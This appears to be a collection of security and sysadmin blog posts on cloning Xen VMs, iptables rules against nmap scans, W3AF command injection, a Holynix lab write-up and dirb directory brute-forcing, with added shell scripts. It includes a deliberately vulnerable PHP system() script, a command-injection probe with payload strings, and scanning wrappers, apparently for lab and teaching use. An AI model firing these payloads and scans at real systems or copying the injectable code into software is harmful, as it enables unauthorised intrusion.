Tuesday, August 28, 2012

Clone/Duplicate a Xen Virtual Machine

Steps:
 
[1] Install the virt-clone utility (on Debian/Ubuntu it ships in the virtinst package, alongside the libvirt Xen driver):

# apt-get install virtinst libvirt-bin  

[2] Shut down the virtual machine you want to clone. virt-clone makes a byte-for-byte copy of the disk image, so the source domain must be stopped, not merely paused, otherwise the copy is taken while the guest is still writing to it. Use either xm or virsh (the domain name here is the one from the example below):

# xm shutdown zimbra

OR

# virsh -c xen:///
virsh # shutdown zimbra


[3] Run virt-clone against the Xen hypervisor and answer its prompts (the name of the source domain, a name for the clone, and a path for the new disk image):

# virt-clone --connect xen:/// --prompt

What is the name of the original virtual machine?
zimbra
What is the name for the cloned virtual machine?
zimbra_clone1
What would you like to use as the cloned disk (file path) for '/home/virtual-images/zimbra_ubuntu.img'?
/home/virtual-images/zimbra_ubuntu_clone.img
Cloning zimbra_ubuntu.img                                                                                     | 117 GB     09:19

Clone 'zimbra_clone1' created successfully.


[4] List the domains; the clone appears as a new, not yet running, domU (stopped domains have no ID and no State column):

# xm list

Name                                        ID   Mem VCPUs      State   Time(s)
Domain-0                                     0  9844     8     r----- 124053.5
centos                                       4  1996     1     -b----   1360.4
debian                                          1587     1                 0.0
freebsd9                                     3  1024     1     -b----    813.4
godavari                                     1  1024     1     -b----    121.3
server2008                                   2  4142     1     -b----   1403.5
zimbra                                          2048     1              8729.8
zimbra_clone1                                   2048     2                 0.0


[5] Boot the clone and change its network settings before it shares a network with the original. virt-clone gives the clone a new MAC address, but the copied disk still carries the original's IP configuration, hostname and SSH host keys, so change the first two and regenerate the host keys (on a Debian/Ubuntu guest: rm /etc/ssh/ssh_host_* && dpkg-reconfigure openssh-server).

[6] Start both the original and the cloned VM.
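The same clone done non-interactively, with a guard that refuses to copy a running domain. This is an added example, not code from the post: the domain names and image path are the post's, the xm list sample is the post's output trimmed to four domains, and it assumes virt-clone from the virtinst package and xm from Xen 4 (virt-clone's -o/-n/-f are the long options --original/--name/--file).

```sh
#!/bin/sh
# Added example: scripted virt-clone with a "source must be shut off" check.

ORIG=${ORIG:-zimbra}
CLONE=${CLONE:-zimbra_clone1}
CLONE_IMG=${CLONE_IMG:-/home/virtual-images/zimbra_ubuntu_clone.img}

# "xm list" output taken from the post, reduced to four domains. Running
# domUs have an ID and a State column; stopped (defined but not running)
# ones show neither, so their lines have fewer fields.
XM_LIST='Name                                        ID   Mem VCPUs      State   Time(s)
Domain-0                                     0  9844     8     r----- 124053.5
centos                                       4  1996     1     -b----   1360.4
debian                                          1587     1                 0.0
zimbra                                          2048     1              8729.8'

# domain_state NAME: reads "xm list" output on stdin and prints running,
# stopped or missing. A running domain has six whitespace-separated fields
# (Name ID Mem VCPUs State Time), a stopped one only four (Name Mem VCPUs Time).
domain_state() {
    awk -v d="$1" '
        NR == 1 { next }
        $1 == d { print (NF == 6 ? "running" : "stopped"); found = 1; exit }
        END     { if (!found) print "missing" }'
}

# clone_cmd ORIG NEW IMG: the non-interactive form of the command the post
# runs with --prompt.
clone_cmd() {
    printf 'virt-clone --connect xen:/// --original %s --name %s --file %s\n' "$1" "$2" "$3"
}

# clone_domain: refuse unless the source is shut off, then clone. Cloning a
# running domain copies a disk image the guest is still writing to, which
# gives an inconsistent filesystem in the clone at best.
clone_domain() {
    state=$(xm list | domain_state "$ORIG")
    if [ "$state" != "stopped" ]; then
        echo "refusing to clone '$ORIG': state is $state (xm shutdown $ORIG first)" >&2
        return 1
    fi
    virt-clone --connect xen:/// --original "$ORIG" --name "$CLONE" --file "$CLONE_IMG"
}
```

Run it as root on dom0 with `clone_domain`, or set ORIG/CLONE/CLONE_IMG in the environment first. The check parses xm list rather than trusting the operator, because a clone of a live Zimbra disk may boot fine and still have a corrupt mail store.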



Thursday, December 22, 2011

BLOCKING NMAP SCANS WITH PF AND IPTABLES

SAMPLE IPTABLES RULES TO BLOCK NMAP SCANS

These four rules only classify packets that belong to a connection the host already knows about; they do nothing on their own about the first SYN of a scan. They are the conntrack preamble of a ruleset and only block anything together with a DROP policy (or a final DROP rule) on INPUT.

# allow replies to connections this host initiated or has accepted
/sbin/iptables -t filter -A INPUT -p tcp -m state --state RELATED,ESTABLISHED -j ACCEPT
/sbin/iptables -t filter -A INPUT -p udp -m state --state RELATED,ESTABLISHED -j ACCEPT
/sbin/iptables -t filter -A INPUT -p icmp -m state --state RELATED,ESTABLISHED -j ACCEPT
# drop packets conntrack cannot fit into any connection (bad sequence numbers, malformed headers)
/sbin/iptables -t filter -A INPUT -m state --state INVALID -j DROP
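A complete INPUT chain that finishes those four rules, in iptables-restore format. This is an added example, not the post's rule set: it assumes tcp/22 is the only service to expose (override with SSH_PORT) and a Linux kernel with the conntrack, hashlimit and limit matches. Note what it does and does not achieve: the DROP policy makes unopened ports show up as "filtered" in nmap instead of "closed", the flag rules kill the NULL/FIN/Xmas scans, and the hashlimit keeps a connect scan or brute-forcer from being answered at full speed; it does not make the host invisible, and nmap -Pn -p22 will still find SSH.

```sh
#!/bin/sh
# Added example: a full filter table built around the conntrack rules above.

SSH_PORT=${SSH_PORT:-22}

# Print the ruleset. Order matters: conntrack first, then the flag
# combinations that only scanners send (nmap -sN/-sF/-sX, SYN+RST, SYN+FIN),
# then the few NEW connections we accept. Everything else meets the DROP
# policy.
build_rules() {
    cat <<EOF
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
# the post's rules in conntrack form: keep existing connections, drop junk
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -m conntrack --ctstate INVALID -j DROP
# flag combinations no legitimate stack sends
-A INPUT -p tcp --tcp-flags ALL NONE -j DROP
-A INPUT -p tcp --tcp-flags ALL FIN -j DROP
-A INPUT -p tcp --tcp-flags ALL FIN,PSH,URG -j DROP
-A INPUT -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
-A INPUT -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
# a NEW connection must begin with a bare SYN
-A INPUT -p tcp ! --syn -m conntrack --ctstate NEW -j DROP
# SSH: at most 3 new connections a minute per source, burst 5; beyond that
# the SYN is dropped rather than answered
-A INPUT -p tcp --dport ${SSH_PORT} -m conntrack --ctstate NEW -m hashlimit --hashlimit-name ssh --hashlimit-mode srcip --hashlimit-upto 3/min --hashlimit-burst 5 -j ACCEPT
-A INPUT -p tcp --dport ${SSH_PORT} -m conntrack --ctstate NEW -j DROP
-A INPUT -p icmp --icmp-type echo-request -m limit --limit 2/s -j ACCEPT
# log what falls through, rate-limited so a scan cannot fill the disk
-A INPUT -m limit --limit 5/min -j LOG --log-prefix "IPT-DROP: " --log-level 4
COMMIT
EOF
}

# apply_rules: iptables-restore loads the whole table atomically, so there
# is no window with a half-built chain. Keep a console session open the
# first time in case the SSH rule is wrong.
apply_rules() {
    build_rules | iptables-restore
}
```

Review the output of `build_rules` first, then `apply_rules` as root; `iptables-save` afterwards shows what the kernel actually loaded.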

Saturday, October 29, 2011

W3AF Command Injection and Web Application Payloads

W3AF [Web Application Attack and Audit Framework] is an open source web application penetration testing framework written in Python. In this post I exploit a command injection vulnerability with W3AF's osCommanding module and show how to use some of the web application payloads that ship with W3AF. The point of "web application payloads" is that any payload can be combined with any exploit inside W3AF, much as Metasploit separates exploits from payloads.

First let's look at a very simple vulnerable PHP script. It is vulnerable on purpose: whatever arrives in the "command" query parameter is handed to system() unchanged, so ?command=ls;id runs both commands. (The fix, for the record, is to never build a shell command from user input; where that is unavoidable, escapeshellarg() and an allow-list of permitted values are the minimum.)

root@test-box:/srv/test# cat index.php
<?php
        // Deliberately vulnerable: the query parameter reaches the shell unescaped.
        if (isset($_GET['command']))
        {
                $cmd = $_GET['command'];
                system($cmd);
        }
        else
        {
           print 'Command Injection Example for W3AF Test';
           print 'Example : http://site/index.php?command=ls ';
        }
?>
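Before reaching for a framework it is worth seeing the check an osCommanding-style plugin automates: send a handful of injection strings that each make the shell echo a random canary, and look for the canary in the response. The script below is an added example, not part of the post or of W3AF; it assumes the page above is reachable at $TARGET with the parameter name "command", that curl is installed, and that you are authorised to test the host.

```sh
#!/bin/sh
# Added example: manual echo-based command-injection probe for index.php.

TARGET=${TARGET:-http://site/index.php}
PARAM=${PARAM:-command}

# canary: 16 random hex characters. The probe counts as a hit only if the
# server sends this string back, which means our text was executed.
canary() { head -c 8 /dev/urandom | od -An -tx1 | tr -d ' \n'; }

# payloads CANARY: one injection string per line. Each uses a different
# separator so the check works whatever the parameter is spliced into:
# on its own (as in index.php), after another command, inside quotes.
payloads() {
    c=$1
    printf '%s\n' \
        "echo $c" \
        ";echo $c" \
        "|echo $c" \
        "&&echo $c" \
        "\`echo $c\`" \
        "'; echo $c; echo '" \
        "\"; echo $c; echo \""
}

# injected BODY CANARY: success (0) if the canary appears in the body on
# its own. A body that contains "echo <canary>" merely reflected our input
# back, which is not execution, so that counts as a miss.
injected() {
    body=$1; c=$2
    case $body in
        *"echo $c"*) return 1 ;;
        *"$c"*)      return 0 ;;
        *)           return 1 ;;
    esac
}

# probe: try each payload against the target; report the first that works.
# -G puts the url-encoded parameter on the query string, as the PHP expects.
probe() {
    c=$(canary)
    payloads "$c" | {
        while IFS= read -r p; do
            body=$(curl -s -G "$TARGET" --data-urlencode "$PARAM=$p")
            if injected "$body" "$c"; then
                printf 'INJECTABLE via %s\n' "$p"
                exit 0
            fi
        done
        exit 1
    }
}
```

`probe` exits 0 on the first working payload; against the index.php above the very first string hits, since the parameter is the whole command. A target that both reflects the input and executes it would be reported as a miss by `injected`; a time-based payload (sleep) is the usual fallback for that case and for blind injection where nothing is echoed at all.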

Monday, August 8, 2011

HOLYNIX VERSION 2.0 SOLUTION

Holynix is a deliberately vulnerable Linux distribution that can be used in a lab as a target for penetration testing. It comes in two versions, version 1 and version 2, and is available for download at http://sourceforge.net/projects/holynix/.

The guys at pynstrom.net have put a lot of hard work into creating the Holynix challenges, and I would like to sincerely thank them for their effort. The goal of each challenge is to obtain a root shell on the Holynix machine. In this article I am writing up a solution for Holynix version 2. I am pretty sure there are more elegant ways to obtain root, but this is how I did it. You will need VMware to run the Holynix version 2 VMware images. I used BackTrack 4 to carry out the attack.

The readme file that comes with Holynix outlines the following facts regarding network configuration:

--------------------------------
Network Configuration 
-------------------------------- 
Holynix v2 is set with static ip and requires some network configuration in order to run. 
Network: 192.168.1.0/24 Pool 
Starting Addr: 192.168.1.2 
Gateway Addr: 192.168.1.1 
Subnet Mask: 255.255.255.0

So Holynix version 2 does not use DHCP; it comes up with a static address somewhere in 192.168.1.0/24. I gave my BackTrack machine the address 192.168.1.220/24 on the same network. The next step was to find the IP address of the target box, which I did with an nmap ping sweep.
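The sweep, with a small filter over nmap's greppable output that lists the live hosts other than the attacker. This is an added example, not from the post: the subnet and BackTrack address are the post's, the sample output is constructed to show the format rather than captured from the lab, and it assumes nmap is on the path (older versions spell -sn as -sP; both are accepted).

```sh
#!/bin/sh
# Added example: ping sweep of the Holynix subnet, parsed from -oG output.

SUBNET=${SUBNET:-192.168.1.0/24}
ME=${ME:-192.168.1.220}

# Shape of "nmap -sn -n -oG -" output: one "Host: <ip> () Status: Up" line
# per responding host between two comment lines. Constructed sample:
SAMPLE='# Nmap 5.51 scan initiated as: nmap -sn -n -oG - 192.168.1.0/24
Host: 192.168.1.1 ()    Status: Up
Host: 192.168.1.2 ()    Status: Up
Host: 192.168.1.220 ()  Status: Up
# Nmap done: 256 IP addresses (3 hosts up) scanned'

# live_hosts: read greppable nmap output on stdin, print the IPs that are
# up, skipping our own address so we do not go on to attack ourselves.
live_hosts() {
    awk -v me="$ME" '$1 == "Host:" && /Status: Up/ && $2 != me { print $2 }'
}

# sweep: -sn = host discovery only, no port scan; -n = no reverse DNS,
# which matters on a lab network with no resolver; -oG - = greppable
# output on stdout.
sweep() { nmap -sn -n -oG - "$SUBNET" | live_hosts; }
```

`sweep` prints the candidate targets one per line, which feeds straight into the next step (`sweep | while read h; do nmap -sS -sV "$h"; done`). Remember that the readme lists 192.168.1.1 as the gateway, so on a real sweep at least two of the hosts found are not Holynix.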



Wednesday, August 3, 2011

Brute force Directory and Files on a Web server using dirb and Backtrack 4

One of the most commonly used web application directory/file brute-force tools is DirBuster from OWASP, a GUI tool written in Java. Dirb is also a directory/file brute-force tool but, unlike OWASP DirBuster, it is a command line utility and can be run from a shell. It is available for download at: http://dirb.sourceforge.net/


In this post I will be showing you how to install and use dirb on a machine running BackTrack 4.


[1] Change directory to /pentest/web/, where BackTrack keeps its web tools:


root@bt:~# cd /pentest/web/


[2] Download the dirb tarball from http://dirb.sourceforge.net/ and expand the tarball :


root@bt:/pentest/web# wget -c 'http://sourceforge.net/projects/dirb/files/dirb/2.03/dirb203.tar.gz/download' -O dirb203.tar.gz
root@bt:/pentest/web# tar -zxvf dirb203.tar.gz
root@bt:/pentest/web# cd dirb
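Once built, dirb is run as `dirb <url> <wordlist> [options]`. The script below is an added example, not part of the post or of dirb: it runs a bounded, non-recursive scan and reduces dirb's output to a list of hits worth following up. It assumes dirb was built in /pentest/web/dirb as above, with its wordlists in the wordlists/ subdirectory, and that the target is $TARGET; the sample output is constructed in dirb's format, not captured from a scan.

```sh
#!/bin/sh
# Added example: wrapper and result parser for dirb.

DIRB=${DIRB:-/pentest/web/dirb/dirb}
WORDLIST=${WORDLIST:-/pentest/web/dirb/wordlists/common.txt}
TARGET=${TARGET:-http://192.168.1.2/}

# dirb prints one line per hit, "+ <url> (CODE:<status>|SIZE:<bytes>)", and
# "==> DIRECTORY: <url>" for each directory it finds. Constructed sample:
SAMPLE='+ http://192.168.1.2/cgi-bin/ (CODE:403|SIZE:292)
==> DIRECTORY: http://192.168.1.2/images/
+ http://192.168.1.2/index.php (CODE:200|SIZE:1520)
+ http://192.168.1.2/server-status (CODE:403|SIZE:296)
+ http://192.168.1.2/robots.txt (CODE:200|SIZE:42)'

# hits: read dirb output on stdin, print "<code> <url>" for direct hits
# and "DIR <url>" for discovered directories.
hits() {
    awk '
        $1 == "+" {
            code = $3; sub(/^\(CODE:/, "", code); sub(/\|.*/, "", code)
            print code, $2
        }
        $1 == "==>" && $2 == "DIRECTORY:" { print "DIR", $3 }'
}

# forbidden: URLs that answered 403. The content exists but is blocked,
# which is often the interesting part of a result set (exposed status
# pages, admin interfaces behind a mis-scoped Allow directive).
forbidden() { hits | awk '$1 == 403 { print $2 }'; }

# scan: -S silences the per-word progress output, -r stops recursion so a
# single run stays bounded, -z 100 waits 100 ms between requests so the
# target (and its logs) are not hammered, -o keeps the raw log for later.
scan() {
    "$DIRB" "$TARGET" "$WORDLIST" -S -r -z 100 -o "dirb-$(date +%Y%m%d-%H%M%S).log" | hits
}
```

`scan` gives the condensed view; the raw log written by -o keeps every line for when a hit needs a second look. Add `-X .php,.bak,.old` to probe file extensions as well as bare names.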